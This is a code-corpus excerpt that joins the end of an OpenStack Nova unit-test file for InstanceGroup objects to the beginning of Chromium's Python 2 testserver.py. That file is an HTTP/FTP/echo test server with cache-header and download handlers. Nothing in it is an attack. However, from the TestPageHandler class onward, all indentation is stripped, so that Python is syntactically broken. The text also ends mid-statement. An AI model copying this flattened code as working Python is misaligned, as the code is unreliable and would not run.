        self.assertEqual(_INST_GROUP_DB['name'], obj.name)
        obj.refresh()
        self.assertEqual('new_name', obj.name)
        self.assertEqual(set([]), obj.obj_what_changed())

    @mock.patch('nova.compute.utils.notify_about_server_group_update')
    @mock.patch('nova.db.instance_group_update')
    @mock.patch('nova.db.instance_group_get')
    def test_save(self, mock_db_get, mock_db_update, mock_notify):
        # save() must push only the changed fields and emit a notification.
        changed_group = copy.deepcopy(_INST_GROUP_DB)
        changed_group['name'] = 'new_name'
        mock_db_get.side_effect = [_INST_GROUP_DB, changed_group]
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx,
                                                _DB_UUID)
        self.assertEqual(obj.name, 'fake_name')
        obj.name = 'new_name'
        obj.policies = ['policy1']  # Remove policy 2
        obj.members = ['instance_id1']  # Remove member 2
        obj.save()
        mock_db_update.assert_called_once_with(mock.sentinel.ctx, _DB_UUID,
                                               {'name': 'new_name',
                                                'members': ['instance_id1'],
                                                'policies': ['policy1']})
        mock_notify.assert_called_once_with(mock.sentinel.ctx, "update",
                                            {'name': 'new_name',
                                             'members': ['instance_id1'],
                                             'policies': ['policy1'],
                                             'server_group_id': _DB_UUID})

    @mock.patch('nova.compute.utils.notify_about_server_group_update')
    @mock.patch('nova.db.instance_group_update')
    @mock.patch('nova.db.instance_group_get')
    def test_save_without_hosts(self, mock_db_get, mock_db_update,
                                mock_notify):
        # 'hosts' is a derived field and must not be persisted by save().
        mock_db_get.side_effect = [_INST_GROUP_DB, _INST_GROUP_DB]
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
        obj.hosts = ['fake-host1']
        self.assertRaises(exception.InstanceGroupSaveException,
                          obj.save)
        # make sure that we can save by removing hosts from what is updated
        obj.obj_reset_changes(['hosts'])
        obj.save()
        # since hosts was the only update, there is no actual call
        self.assertFalse(mock_db_update.called)
        self.assertFalse(mock_notify.called)

    @mock.patch('nova.compute.utils.notify_about_server_group_update')
    @mock.patch('nova.db.instance_group_create', return_value=_INST_GROUP_DB)
    def test_create(self, mock_db_create, mock_notify):
        obj = objects.InstanceGroup(context=mock.sentinel.ctx)
        obj.uuid = _DB_UUID
        obj.name = _INST_GROUP_DB['name']
        obj.user_id = _INST_GROUP_DB['user_id']
        obj.project_id = _INST_GROUP_DB['project_id']
        obj.members = _INST_GROUP_DB['members']
        obj.policies = _INST_GROUP_DB['policies']
        obj.updated_at = _TS_NOW
        obj.created_at = _TS_NOW
        obj.deleted_at = None
        obj.deleted = False
        obj.create()
        # members/policies travel as separate kwargs, not in the values dict.
        mock_db_create.assert_called_once_with(
            mock.sentinel.ctx,
            {'uuid': _DB_UUID,
             'name': _INST_GROUP_DB['name'],
             'user_id': _INST_GROUP_DB['user_id'],
             'project_id': _INST_GROUP_DB['project_id'],
             'created_at': _TS_NOW,
             'updated_at': _TS_NOW,
             'deleted_at': None,
             'deleted': False,
             },
            members=_INST_GROUP_DB['members'],
            policies=_INST_GROUP_DB['policies'])
        mock_notify.assert_called_once_with(
            mock.sentinel.ctx, "create",
            {'uuid': _DB_UUID,
             'name': _INST_GROUP_DB['name'],
             'user_id': _INST_GROUP_DB['user_id'],
             'project_id': _INST_GROUP_DB['project_id'],
             'created_at': _TS_NOW,
             'updated_at': _TS_NOW,
             'deleted_at': None,
             'deleted': False,
             'members': _INST_GROUP_DB['members'],
             'policies': _INST_GROUP_DB['policies'],
             'server_group_id': _DB_UUID})
        # A second create() on the same object must fail.
        self.assertRaises(exception.ObjectActionError, obj.create)

    @mock.patch('nova.compute.utils.notify_about_server_group_update')
    @mock.patch('nova.db.instance_group_delete')
    def test_destroy(self, mock_db_delete, mock_notify):
        obj = objects.InstanceGroup(context=mock.sentinel.ctx)
        obj.uuid = _DB_UUID
        obj.destroy()
        mock_db_delete.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
        mock_notify.assert_called_once_with(mock.sentinel.ctx, "delete",
                                            {'server_group_id': _DB_UUID})

    @mock.patch('nova.compute.utils.notify_about_server_group_update')
    @mock.patch('nova.db.instance_group_members_add')
    def test_add_members(self, mock_members_add_db, mock_notify):
        mock_members_add_db.return_value = [mock.sentinel.members]
        members = objects.InstanceGroup.add_members(mock.sentinel.ctx,
                                                    _DB_UUID,
                                                    mock.sentinel.members)
        self.assertEqual([mock.sentinel.members], members)
        mock_members_add_db.assert_called_once_with(
            mock.sentinel.ctx,
            _DB_UUID,
            mock.sentinel.members)
        mock_notify.assert_called_once_with(
            mock.sentinel.ctx, "addmember",
            {'instance_uuids': mock.sentinel.members,
             'server_group_id': _DB_UUID})

    @mock.patch('nova.objects.InstanceList.get_by_filters')
    @mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
    def test_count_members_by_user(self, mock_get_db, mock_il_get):
        # Count is taken over non-deleted members owned by the given user.
        mock_il_get.return_value = [mock.ANY]
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
        expected_filters = {
            'uuid': ['instance_id1', 'instance_id2'],
            'user_id': 'fake_user',
            'deleted': False
        }
        self.assertEqual(1, obj.count_members_by_user('fake_user'))
        mock_il_get.assert_called_once_with(mock.sentinel.ctx,
                                            filters=expected_filters)

    @mock.patch('nova.objects.InstanceList.get_by_filters')
    @mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
    def test_get_hosts(self, mock_get_db, mock_il_get):
        mock_il_get.return_value = [objects.Instance(host='host1'),
                                    objects.Instance(host='host2'),
                                    objects.Instance(host=None)]
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
        hosts = obj.get_hosts()
        self.assertEqual(['instance_id1', 'instance_id2'], obj.members)
        expected_filters = {
            'uuid': ['instance_id1', 'instance_id2'],
            'deleted': False
        }
        mock_il_get.assert_called_once_with(mock.sentinel.ctx,
                                            filters=expected_filters)
        # Instances without a host assigned are filtered out.
        self.assertEqual(2, len(hosts))
        self.assertIn('host1', hosts)
        self.assertIn('host2', hosts)
        # Test manual exclusion
        mock_il_get.reset_mock()
        hosts = obj.get_hosts(exclude=['instance_id1'])
        expected_filters = {
            'uuid': set(['instance_id2']),
            'deleted': False
        }
        mock_il_get.assert_called_once_with(mock.sentinel.ctx,
                                            filters=expected_filters)

    @mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
    def test_obj_make_compatible(self, mock_db_get):
        # Downgrading to version 1.6 must re-add the 'metadetails' field.
        obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
        obj_primitive = obj.obj_to_primitive()
        self.assertNotIn('metadetails', obj_primitive)
        obj.obj_make_compatible(obj_primitive, '1.6')
        self.assertEqual({}, obj_primitive['metadetails'])

    @mock.patch.object(objects.InstanceList, 'get_by_filters')
    def test_load_hosts(self, mock_get_by_filt):
        # Accessing .hosts lazily loads it and must not mark it dirty.
        mock_get_by_filt.return_value = [objects.Instance(host='host1'),
                                         objects.Instance(host='host2')]
        obj = objects.InstanceGroup(mock.sentinel.ctx, members=['uuid1'])
        self.assertEqual(2, len(obj.hosts))
        self.assertIn('host1', obj.hosts)
        self.assertIn('host2', obj.hosts)
        self.assertNotIn('hosts', obj.obj_what_changed())

    def test_load_anything_else_but_hosts(self):
        # Only 'hosts' supports lazy loading; other unset fields raise.
        obj = objects.InstanceGroup(mock.sentinel.ctx)
        self.assertRaises(exception.ObjectActionError, getattr, obj, 'members')
class TestInstanceGroupObject(test_objects._LocalTest,
                              _TestInstanceGroupObject):
    """Runs the shared InstanceGroup tests against the local backend."""
class TestRemoteInstanceGroupObject(test_objects._RemoteTest,
                                    _TestInstanceGroupObject):
    """Runs the shared InstanceGroup tests against the remote backend."""
def _mock_db_list_get(*args):
    """Fake DB-layer list call.

    Returns four instance-group rows derived from the module fixture,
    each with a fresh uuid and its own (name, project_id) pair.
    """
    specs = [('f1', 'p1'), ('f2', 'p1'), ('f3', 'p2'), ('f4', 'p2')]
    rows = []
    for name, project_id in specs:
        row = copy.deepcopy(_INST_GROUP_DB)
        row['uuid'] = str(uuid.uuid4())
        row['name'] = name
        row['project_id'] = project_id
        rows.append(row)
    return rows
class _TestInstanceGroupListObject(object):
    """Shared InstanceGroupList tests, run locally and remotely below."""

    @mock.patch('nova.db.instance_group_get_all')
    def test_list_all(self, mock_db_get):
        mock_db_get.side_effect = _mock_db_list_get
        inst_list = objects.InstanceGroupList.get_all(mock.sentinel.ctx)
        self.assertEqual(4, len(inst_list.objects))
        mock_db_get.assert_called_once_with(mock.sentinel.ctx)

    @mock.patch('nova.db.instance_group_get_all_by_project_id')
    def test_list_by_project_id(self, mock_db_get):
        mock_db_get.side_effect = _mock_db_list_get
        objects.InstanceGroupList.get_by_project_id(
            mock.sentinel.ctx, mock.sentinel.project_id)
        mock_db_get.assert_called_once_with(
            mock.sentinel.ctx, mock.sentinel.project_id)

    @mock.patch('nova.db.instance_group_get_all_by_project_id')
    def test_get_by_name(self, mock_db_get):
        mock_db_get.side_effect = _mock_db_list_get
        # Need the project_id value set, otherwise we'd use mock.sentinel
        mock_ctx = mock.MagicMock()
        mock_ctx.project_id = 'fake_project'
        ig = objects.InstanceGroup.get_by_name(mock_ctx, 'f1')
        mock_db_get.assert_called_once_with(mock_ctx, 'fake_project')
        self.assertEqual('f1', ig.name)
        # An unknown name must raise rather than return None.
        self.assertRaises(exception.InstanceGroupNotFound,
                          objects.InstanceGroup.get_by_name,
                          mock_ctx, 'unknown')

    @mock.patch('nova.objects.InstanceGroup.get_by_uuid')
    @mock.patch('nova.objects.InstanceGroup.get_by_name')
    def test_get_by_hint(self, mock_name, mock_uuid):
        # A UUID-shaped hint dispatches to get_by_uuid, others to get_by_name.
        objects.InstanceGroup.get_by_hint(mock.sentinel.ctx, _DB_UUID)
        mock_uuid.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
        objects.InstanceGroup.get_by_hint(mock.sentinel.ctx, 'name')
        mock_name.assert_called_once_with(mock.sentinel.ctx, 'name')
class TestInstanceGroupListObject(test_objects._LocalTest,
                                  _TestInstanceGroupListObject):
    """Runs the shared InstanceGroupList tests against the local backend."""
class TestRemoteInstanceGroupListObject(test_objects._RemoteTest,
                                        _TestInstanceGroupListObject):
    """Runs the shared InstanceGroupList tests against the remote backend."""
| apache-2.0 |
mogoweb/chromium-crosswalk | net/tools/testserver/testserver.py | 2 | 74923 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a simple HTTP/FTP/TCP/UDP/BASIC_AUTH_PROXY/WEBSOCKET server used for
testing Chrome.
It supports several test URLs, as specified by the handlers in TestPageHandler.
By default, it listens on an ephemeral port and sends the port number back to
the originating process over a pipe. The originating process can specify an
explicit port if necessary.
It can use https if you specify the flag --https=CERT where CERT is the path
to a pem file containing the certificate and private key that should be used.
"""
import base64
import BaseHTTPServer
import cgi
import hashlib
import logging
import minica
import os
import json
import random
import re
import select
import socket
import SocketServer
import struct
import sys
import threading
import time
import urllib
import urlparse
import zlib
import echo_message
import pyftpdlib.ftpserver
import testserver_base
import tlslite
import tlslite.api
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(
0, os.path.join(BASE_DIR, '..', '..', '..', 'third_party/pywebsocket/src'))
from mod_pywebsocket.standalone import WebSocketServer
# Server type identifiers; one of these selects which server the test
# harness starts.
SERVER_HTTP = 0
SERVER_FTP = 1
SERVER_TCP_ECHO = 2
SERVER_UDP_ECHO = 3
SERVER_BASIC_AUTH_PROXY = 4
SERVER_WEBSOCKET = 5

# Default request queue size for WebSocketServer.
_DEFAULT_REQUEST_QUEUE_SIZE = 128
class WebSocketOptions:
  """Option bag passed to mod_pywebsocket's WebSocketServer."""

  def __init__(self, host, port, data_dir):
    # Endpoint and handler location.
    self.server_host = host
    self.port = port
    self.websock_handlers = data_dir
    self.request_queue_size = _DEFAULT_REQUEST_QUEUE_SIZE

    # Handler discovery stays confined to the handlers root.
    self.scan_dir = None
    self.allow_handlers_outside_root_dir = False
    self.websock_handlers_map_file = None
    self.cgi_directories = []
    self.is_executable_method = None

    # Protocol strictness: reject draft-75 clients.
    self.allow_draft75 = False
    self.strict = True

    # TLS and authentication are disabled by default.
    self.use_tls = False
    self.private_key = None
    self.certificate = None
    self.tls_client_auth = False
    self.tls_client_ca = None
    self.use_basic_auth = False
class RecordingSSLSessionCache(object):
  """TLS session cache stand-in that records its traffic.

  Every lookup and insert is appended to self.log so tests can verify
  session-cache behaviour.  Lookups always miss (KeyError) and inserts
  deliberately discard the session itself.
  """

  def __init__(self):
    self.log = []

  def __getitem__(self, session_id):
    # Record the lookup, then behave as a cache miss.
    self.log.append(('lookup', session_id))
    raise KeyError()

  def __setitem__(self, session_id, session):
    # Record the insert but drop the session object.
    self.log.append(('insert', session_id))
class HTTPServer(testserver_base.ClientRestrictingServerMixIn,
                 testserver_base.BrokenPipeHandlerMixIn,
                 testserver_base.StoppableHTTPServer):
  """StoppableHTTPServer augmented with client-address verification and
  broken-pipe tolerance via the two mix-ins; no behaviour of its own."""
  pass
class OCSPServer(testserver_base.ClientRestrictingServerMixIn,
                 testserver_base.BrokenPipeHandlerMixIn,
                 BaseHTTPServer.HTTPServer):
  """HTTPServer specialization that serves an OCSP response."""

  def serve_forever_on_thread(self):
    """Starts serve_forever() on a background thread and returns."""
    worker = threading.Thread(target=self.serve_forever,
                              name="OCSPServerThread")
    self.thread = worker
    worker.start()

  def stop_serving(self):
    """Stops the serving loop and joins the background thread."""
    self.shutdown()
    self.thread.join()
class HTTPSServer(tlslite.api.TLSSocketServerMixIn,
                  testserver_base.ClientRestrictingServerMixIn,
                  testserver_base.BrokenPipeHandlerMixIn,
                  testserver_base.StoppableHTTPServer):
  """This is a specialization of StoppableHTTPServer that add https support and
  client verification."""

  def __init__(self, server_address, request_hander_class, pem_cert_and_key,
               ssl_client_auth, ssl_client_cas, ssl_bulk_ciphers,
               record_resume_info, tls_intolerant):
    # pem_cert_and_key holds both the server certificate chain and the
    # matching private key in PEM form.
    self.cert_chain = tlslite.api.X509CertChain().parseChain(pem_cert_and_key)
    # Force using only python implementation - otherwise behavior is different
    # depending on whether m2crypto Python module is present (error is thrown
    # when it is). m2crypto uses a C (based on OpenSSL) implementation under
    # the hood.
    self.private_key = tlslite.api.parsePEMKey(pem_cert_and_key,
                                               private=True,
                                               implementations=['python'])
    self.ssl_client_auth = ssl_client_auth
    self.ssl_client_cas = []
    self.tls_intolerant = tls_intolerant

    # Collect the subject names of CAs acceptable for client certificates.
    for ca_file in ssl_client_cas:
      s = open(ca_file).read()
      x509 = tlslite.api.X509()
      x509.parse(s)
      self.ssl_client_cas.append(x509.subject)
    self.ssl_handshake_settings = tlslite.api.HandshakeSettings()
    if ssl_bulk_ciphers is not None:
      self.ssl_handshake_settings.cipherNames = ssl_bulk_ciphers

    if record_resume_info:
      # If record_resume_info is true then we'll replace the session cache with
      # an object that records the lookups and inserts that it sees.
      self.session_cache = RecordingSSLSessionCache()
    else:
      self.session_cache = tlslite.api.SessionCache()
    testserver_base.StoppableHTTPServer.__init__(self,
                                                 server_address,
                                                 request_hander_class)

  def handshake(self, tlsConnection):
    """Creates the SSL connection.

    Returns True when the handshake succeeds (or the peer closed
    abruptly, which is tolerated), False on any other TLS error.
    """
    try:
      self.tlsConnection = tlsConnection
      tlsConnection.handshakeServer(certChain=self.cert_chain,
                                    privateKey=self.private_key,
                                    sessionCache=self.session_cache,
                                    reqCert=self.ssl_client_auth,
                                    settings=self.ssl_handshake_settings,
                                    reqCAs=self.ssl_client_cas,
                                    tlsIntolerant=self.tls_intolerant)
      tlsConnection.ignoreAbruptClose = True
      return True
    except tlslite.api.TLSAbruptCloseError:
      # Ignore abrupt close.
      return True
    except tlslite.api.TLSError, error:
      print "Handshake failure:", str(error)
      return False
class FTPServer(testserver_base.ClientRestrictingServerMixIn,
                pyftpdlib.ftpserver.FTPServer):
  """pyftpdlib FTPServer restricted to the expected client address; adds
  no behaviour of its own."""
  pass
class TCPEchoServer(testserver_base.ClientRestrictingServerMixIn,
                    SocketServer.TCPServer):
  """A TCP echo server that echoes back what it has received."""

  def server_bind(self):
    """Override server_bind to store the server name."""
    SocketServer.TCPServer.server_bind(self)
    host, port = self.socket.getsockname()[:2]
    self.server_name = socket.getfqdn(host)
    self.server_port = port

  def serve_forever(self):
    # Handle one request at a time until self.stop becomes True.
    # NOTE(review): nothing in this class sets self.stop to True, so the
    # flag is presumably flipped externally -- confirm with the callers.
    self.stop = False
    self.nonce_time = None
    while not self.stop:
      self.handle_request()
    self.socket.close()
class UDPEchoServer(testserver_base.ClientRestrictingServerMixIn,
                    SocketServer.UDPServer):
  """A UDP echo server that echoes back what it has received."""

  def server_bind(self):
    """Override server_bind to store the server name."""
    SocketServer.UDPServer.server_bind(self)
    host, port = self.socket.getsockname()[:2]
    self.server_name = socket.getfqdn(host)
    self.server_port = port

  def serve_forever(self):
    # Handle one datagram at a time until self.stop becomes True.
    # NOTE(review): as with TCPEchoServer, self.stop appears to be flipped
    # externally -- confirm with the callers.
    self.stop = False
    self.nonce_time = None
    while not self.stop:
      self.handle_request()
    self.socket.close()
class TestPageHandler(testserver_base.BasePageHandler):
# Class variables to allow for persistence state between page handler
# invocations
rst_limits = {}
fail_precondition = {}
def __init__(self, request, client_address, socket_server):
connect_handlers = [
self.RedirectConnectHandler,
self.ServerAuthConnectHandler,
self.DefaultConnectResponseHandler]
get_handlers = [
self.NoCacheMaxAgeTimeHandler,
self.NoCacheTimeHandler,
self.CacheTimeHandler,
self.CacheExpiresHandler,
self.CacheProxyRevalidateHandler,
self.CachePrivateHandler,
self.CachePublicHandler,
self.CacheSMaxAgeHandler,
self.CacheMustRevalidateHandler,
self.CacheMustRevalidateMaxAgeHandler,
self.CacheNoStoreHandler,
self.CacheNoStoreMaxAgeHandler,
self.CacheNoTransformHandler,
self.DownloadHandler,
self.DownloadFinishHandler,
self.EchoHeader,
self.EchoHeaderCache,
self.EchoAllHandler,
self.ZipFileHandler,
self.FileHandler,
self.SetCookieHandler,
self.SetManyCookiesHandler,
self.ExpectAndSetCookieHandler,
self.SetHeaderHandler,
self.AuthBasicHandler,
self.AuthDigestHandler,
self.SlowServerHandler,
self.ChunkedServerHandler,
self.ContentTypeHandler,
self.NoContentHandler,
self.ServerRedirectHandler,
self.ClientRedirectHandler,
self.MultipartHandler,
self.GetSSLSessionCacheHandler,
self.SSLManySmallRecords,
self.GetChannelID,
self.CloseSocketHandler,
self.RangeResetHandler,
self.DefaultResponseHandler]
post_handlers = [
self.EchoTitleHandler,
self.EchoHandler,
self.PostOnlyFileHandler,
self.EchoMultipartPostHandler] + get_handlers
put_handlers = [
self.EchoTitleHandler,
self.EchoHandler] + get_handlers
head_handlers = [
self.FileHandler,
self.DefaultResponseHandler]
self._mime_types = {
'crx' : 'application/x-chrome-extension',
'exe' : 'application/octet-stream',
'gif': 'image/gif',
'jpeg' : 'image/jpeg',
'jpg' : 'image/jpeg',
'json': 'application/json',
'pdf' : 'application/pdf',
'txt' : 'text/plain',
'wav' : 'audio/wav',
'xml' : 'text/xml'
}
self._default_mime_type = 'text/html'
testserver_base.BasePageHandler.__init__(self, request, client_address,
socket_server, connect_handlers,
get_handlers, head_handlers,
post_handlers, put_handlers)
def GetMIMETypeFromName(self, file_name):
"""Returns the mime type for the specified file_name. So far it only looks
at the file extension."""
(_shortname, extension) = os.path.splitext(file_name.split("?")[0])
if len(extension) == 0:
# no extension.
return self._default_mime_type
# extension starts with a dot, so we need to remove it
return self._mime_types.get(extension[1:], self._default_mime_type)
def NoCacheMaxAgeTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and no caching requested."""
if not self._ShouldHandleRequest("/nocachetime/maxage"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def NoCacheTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and no caching requested."""
if not self._ShouldHandleRequest("/nocachetime"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'no-cache')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for one minute."""
if not self._ShouldHandleRequest("/cachetime"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'max-age=60')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheExpiresHandler(self):
"""This request handler yields a page with the title set to the current
system time, and set the page to expire on 1 Jan 2099."""
if not self._ShouldHandleRequest("/cache/expires"):
return False
self.send_response(200)
self.send_header('Expires', 'Thu, 1 Jan 2099 00:00:00 GMT')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheProxyRevalidateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 60 seconds"""
if not self._ShouldHandleRequest("/cache/proxy-revalidate"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, proxy-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CachePrivateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 5 seconds."""
if not self._ShouldHandleRequest("/cache/private"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=3, private')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CachePublicHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 5 seconds."""
if not self._ShouldHandleRequest("/cache/public"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=3, public')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheSMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow for caching."""
if not self._ShouldHandleRequest("/cache/s-maxage"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'public, s-maxage = 60, max-age = 0')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheMustRevalidateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow caching."""
if not self._ShouldHandleRequest("/cache/must-revalidate"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'must-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheMustRevalidateMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow caching event though max-age of 60
seconds is specified."""
if not self._ShouldHandleRequest("/cache/must-revalidate/max-age"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, must-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoStoreHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the page to be stored."""
if not self._ShouldHandleRequest("/cache/no-store"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-store')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoStoreMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the page to be stored even though max-age
of 60 seconds is specified."""
if not self._ShouldHandleRequest("/cache/no-store/max-age"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, no-store')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoTransformHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the content to transformed during
user-agent caching"""
if not self._ShouldHandleRequest("/cache/no-transform"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-transform')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
  def EchoHeader(self):
    """This handler echoes back the value of a specific request header."""
    # Uncached variant; see EchoHeaderHelper for the query-string format.
    return self.EchoHeaderHelper("/echoheader")
  def EchoHeaderCache(self):
    """This function echoes back the value of a specific request header while
    allowing caching for 16 hours."""
    # "16 hours" is the max-age=60000 (seconds) set in EchoHeaderHelper.
    return self.EchoHeaderHelper("/echoheadercache")
def EchoHeaderHelper(self, echo_header):
"""This function echoes back the value of the request header passed in."""
if not self._ShouldHandleRequest(echo_header):
return False
query_char = self.path.find('?')
if query_char != -1:
header_name = self.path[query_char+1:]
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
if echo_header == '/echoheadercache':
self.send_header('Cache-control', 'max-age=60000')
else:
self.send_header('Cache-control', 'no-cache')
# insert a vary header to properly indicate that the cachability of this
# request is subject to value of the request header being echoed.
if len(header_name) > 0:
self.send_header('Vary', header_name)
self.end_headers()
if len(header_name) > 0:
self.wfile.write(self.headers.getheader(header_name))
return True
def ReadRequestBody(self):
"""This function reads the body of the current HTTP request, handling
both plain and chunked transfer encoded requests."""
if self.headers.getheader('transfer-encoding') != 'chunked':
length = int(self.headers.getheader('content-length'))
return self.rfile.read(length)
# Read the request body as chunks.
body = ""
while True:
line = self.rfile.readline()
length = int(line, 16)
if length == 0:
self.rfile.readline()
break
body += self.rfile.read(length)
self.rfile.read(2)
return body
def EchoHandler(self):
"""This handler just echoes back the payload of the request, for testing
form submission."""
if not self._ShouldHandleRequest("/echo"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(self.ReadRequestBody())
return True
def EchoTitleHandler(self):
"""This handler is like Echo, but sets the page title to the request."""
if not self._ShouldHandleRequest("/echotitle"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
request = self.ReadRequestBody()
self.wfile.write('<html><head><title>')
self.wfile.write(request)
self.wfile.write('</title></head></html>')
return True
def EchoAllHandler(self):
"""This handler yields a (more) human-readable page listing information
about the request header & contents."""
if not self._ShouldHandleRequest("/echoall"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><style>'
'pre { border: 1px solid black; margin: 5px; padding: 5px }'
'</style></head><body>'
'<div style="float: right">'
'<a href="/echo">back to referring page</a></div>'
'<h1>Request Body:</h1><pre>')
if self.command == 'POST' or self.command == 'PUT':
qs = self.ReadRequestBody()
params = cgi.parse_qs(qs, keep_blank_values=1)
for param in params:
self.wfile.write('%s=%s\n' % (param, params[param][0]))
self.wfile.write('</pre>')
self.wfile.write('<h1>Request Headers:</h1><pre>%s</pre>' % self.headers)
self.wfile.write('</body></html>')
return True
def EchoMultipartPostHandler(self):
"""This handler echoes received multipart post data as json format."""
if not (self._ShouldHandleRequest("/echomultipartpost") or
self._ShouldHandleRequest("/searchbyimage")):
return False
content_type, parameters = cgi.parse_header(
self.headers.getheader('content-type'))
if content_type == 'multipart/form-data':
post_multipart = cgi.parse_multipart(self.rfile, parameters)
elif content_type == 'application/x-www-form-urlencoded':
raise Exception('POST by application/x-www-form-urlencoded is '
'not implemented.')
else:
post_multipart = {}
# Since the data can be binary, we encode them by base64.
post_multipart_base64_encoded = {}
for field, values in post_multipart.items():
post_multipart_base64_encoded[field] = [base64.b64encode(value)
for value in values]
result = {'POST_multipart' : post_multipart_base64_encoded}
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(json.dumps(result, indent=2, sort_keys=False))
return True
  def DownloadHandler(self):
    """This handler sends a downloadable file in two chunks (35K then 10K),
    with or without reporting the total size up front.

    /download-known-size sends a Content-Length header;
    /download-unknown-size omits it. Between the two chunks the server
    re-enters its request loop until another request (DownloadFinishHandler)
    clears self.server.wait_for_download, which lets tests pause a download
    mid-stream.
    """
    if self.path.startswith("/download-unknown-size"):
      send_length = False
    elif self.path.startswith("/download-known-size"):
      send_length = True
    else:
      return False

    #
    # The test which uses this functionality is attempting to send
    # small chunks of data to the client.  Use a fairly large buffer
    # so that we'll fill chrome's IO buffer enough to force it to
    # actually write the data.
    # See also the comments in the client-side of this test in
    # download_uitest.cc
    #
    size_chunk1 = 35*1024
    size_chunk2 = 10*1024

    self.send_response(200)
    self.send_header('Content-Type', 'application/octet-stream')
    self.send_header('Cache-Control', 'max-age=0')
    if send_length:
      self.send_header('Content-Length', size_chunk1 + size_chunk2)
    self.end_headers()

    # First chunk of data:
    self.wfile.write("*" * size_chunk1)
    self.wfile.flush()

    # handle requests until one of them clears this flag.
    self.server.wait_for_download = True
    while self.server.wait_for_download:
      self.server.handle_request()

    # Second chunk of data:
    self.wfile.write("*" * size_chunk2)
    return True
def DownloadFinishHandler(self):
"""This handler just tells the server to finish the current download."""
if not self._ShouldHandleRequest("/download-finish"):
return False
self.server.wait_for_download = False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=0')
self.end_headers()
return True
def _ReplaceFileData(self, data, query_parameters):
"""Replaces matching substrings in a file.
If the 'replace_text' URL query parameter is present, it is expected to be
of the form old_text:new_text, which indicates that any old_text strings in
the file are replaced with new_text. Multiple 'replace_text' parameters may
be specified.
If the parameters are not present, |data| is returned.
"""
query_dict = cgi.parse_qs(query_parameters)
replace_text_values = query_dict.get('replace_text', [])
for replace_text_value in replace_text_values:
replace_text_args = replace_text_value.split(':')
if len(replace_text_args) != 2:
raise ValueError(
'replace_text must be of form old_text:new_text. Actual value: %s' %
